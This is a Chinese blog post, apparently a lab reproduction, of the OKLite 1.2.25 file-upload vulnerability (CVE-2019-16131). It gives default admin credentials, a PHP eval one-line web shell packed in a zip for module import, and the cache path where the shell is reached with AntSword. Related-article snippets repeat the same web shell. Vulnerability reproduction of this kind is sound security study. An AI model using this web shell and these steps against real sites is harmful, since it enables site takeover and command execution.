OKLite文件上传 (CVE-2019-16131)

最新推荐文章于 2024-07-12 16:08:50 发布
最新推荐文章于 2024-07-12 16:08:50 发布
阅读量454 收藏 10
点赞数 5
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135815152
版权

漏洞描述:

锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。

锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。攻击者可利用该漏洞上传任意文件。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问http://ip:port/admin.php?c=login,进入登录页面

3.输入账号密码进行登录

账号:admin

密码:admin

4.模块管理-模块导入,导入1.zip,包含1.php

<?php @eval($_POST['cmd']);?>

5.蚁剑连接,getshell

​http://ip:port/data/cache/1.php

借此漏洞攻击者获取到网站的shell权限,控制整个网站,可以进行文件读取和命令执行。

修复建议:

1.升级版本。

慕筱蚺
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OKLite v1.2.25 任意文件删除漏洞(CVE-2019-16132)
Darklord.W
11-19 759
OKLite v1.2.25 任意文件删除漏洞(CVE-2019-16132) 漏洞描述: ​ An issue was discovered in OKLite v1.2.25. framework/admin/tpl_control.php allows remote attackers to delete arbitrary files via a title directory-traversal pathname followed by a crafted substring. 影响版本: ​ O
【漏洞复现-oklite-文件】vulfocus/oklite-cve_2019_16131
10-10 1289
oklite-文件】抓包获取文件路径
oklite 文件CVE-2019-16131)漏洞复现
weixin_42675091的博客
09-03 757
oklite 文件CVE-2019-16131)漏洞复现
oklite 文件漏洞(CVE-2019-16131)
小小猪的博客
12-29 968
oklite 文件漏洞(CVE-2019-16131) 漏洞简介: Ethan发现OKLite v1.2.25 存在任意文件漏洞(需要登录后台) 影响范围: OKLite v1.2.25 版本 环境搭建: 在线环境 地址 漏洞复现: 访问首页 访问后台 账号密码:admin admin 进行登录 进入管理模块,点击模块导入 创建一句话zip 将创建的zip进行上成功 进行访问 蚁剑进行连接 获得shell 漏洞修复: ...
CVE 2019 16131 OKLite v1.2.25 任意文件漏洞
wj33333的博客
10-27 78
OKLite v1.2.25 存在任意文件漏洞漏洞编号漏洞类型文件漏洞等级高危产品OKLite组件OKLite
PHPOK轻型企业站OKLite-PHP
06-20
如:减少缓存文件(P4完整版第一次运行就有可能生成上百个缓存文件,而Lite版不超过20个)性能更优。将Cache和DB重新分开,便于接入。 包含功能有: 网站基本信息管理,包括支持自定义扩展。 内容模块自定义管理,...
Xsafe#PeiQi-WIKI-POC#OKLite 1.2.25 后台插件安装 任意文件2
07-25
OKLite 1.2.25 后台插件安装 任意文件漏洞描述OKLite v1.2.25 后台插件过滤不完善导致可以上恶意木马文件漏洞影响漏洞复现关于执行逻
渗透测试常用poc、工具集合
01-06
CVE-2019-16131 OKLite v1.2.25任意文件漏洞 CVE-2019-16132 OKLite v1.2.25存在任意文件删除漏洞 CVE-2019-16309 FlameCMS 3.3.5后台登录处存在sql注入漏洞] CVE-2019-16313蜂网互联企业级路由器v4.31密码泄露...
WPS版OneKeyTools-Lite(多个PPT合并插件)
10-01
然而,当需要处理多个PPT文件时,手动合并可能会耗费大量时间和精力。为了解决这一问题,"WPS版OneKeyTools-Lite"应运而生,这是一个专门针对WPS Office设计的PPT批量处理插件,特别适用于需要合并多个PPT文件的场景...
PHPOK轻型企业站OKLite v2.0.32
09-28
为您提供PHPOK轻型企业站OKLite下载,Lite版本的出现,出于精简需求使用!从市场出发,考虑绝大多数小企业站的需求。程序不仅仅只是P4的简化,还有一些自己的优化!如:减少缓存文件(P4完整版第一次运行就有可能...
PHPOK轻型企业站OKLite v1.2.25
11-26
Lite版本的出现,出于精简需求使用!从市场出发,考虑绝大多数小企业站的需求。程序不仅仅只是P4的简化,还有一些自己的优化! 如:减少缓存文件(P4完整版第一次运行就有可能生
OKLite 1.2.25 后台文件getshell
抚琴
01-08 421
OKLite是一套极简企业站系统,主要目标群体是展示型企业网站用户,让统小企业快速布署网站,加强自身品牌意识,实现对公司形象的宣。本系统最初是PHPOK程序精简而来。在同等配置下,OKLite速度优于PHPOK达30%以上。 通过上任意文件漏洞,可以获得WebShell权限。 登录后台 admin admin123 把1.php压缩成1.zip <?php @eval($_POST[1]);?> 环境在我博客里下载docker ...
OK插件安装常见问题集锦(PowerPoint版)|OneKeyTools Lite安装说明
热门推荐
qq_34017390的博客
12-16 1万+
OneKeyTools Lite安装说明 (一)关于OneKeyTools Lite OneKeyTools Lite(轻简)版是由 @只为设计 个人独立开发的免费演示插件。Lite版分别支持微软Office 2007以上版本和WPS Office 2016以上版本,请根据自己需要下载相应版本 (二)支持软件 支持Microsoft Office 2007/2010/2013/2016/2019/365 (三)支持系统 支持Windows XP/Vista/7/8/8.1/10,不支持其他桌面或
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2729)
00勇士王子的博客
07-15 1830
漏洞介绍 解题过程 1.访问靶场 2.漏洞存在于:_async/AsyncResponseService,访问地址可以访问则存在漏洞 3.使用burp抓包然后构造payload发送到服务器,使服务器执行命令 执行id命令 执行whoami 命令 执行ls /tmp 命令,没有返回结果 POC ...
CVE-2019-16920:D-link RCE漏洞
systemino的博客
10-10 1729
简介 2019年9月,Fortinet FortiGuard实验室发现并报告了D-Link 产品中的有个非认证的命令注入漏洞——CVE-2019-16920,成功利用该漏洞可以导致远程代码执行。因为该漏洞可以在不经过认证的情况下远程触发,因此研究人员将该漏洞评为中危。 受影响的产品包括D-Link的: ·DIR-655 ·DIR-866L ·DIR-652 ·DHP-1565 ...
libssh2被发现整数溢出和越界读取漏洞(CVE-2019-13115)
systemino的博客
07-14 1252
libssh2是一个C函数库,用来实现SSH2协议。SSH2是一套安全通讯协议框架(早期的SSH1由于存在安全漏洞),基于SSH2协议的产品主要有openssh,putty,SSH Secure Shell Client等,这些都是开源的,但是这些代码非常难懂而且复杂,一个个函数深层次的调用很快就让人在C语言代码的海洋中迷失了方向,妄图通过从这些开源软件中抽取程序代码段来“组装”自己的应用程序是非...
CVE-2019-16278:Nostromo Web服务器的远程命令执行
NOSEC2019的博客
10-22 2597
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1143
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 1261
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 725
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值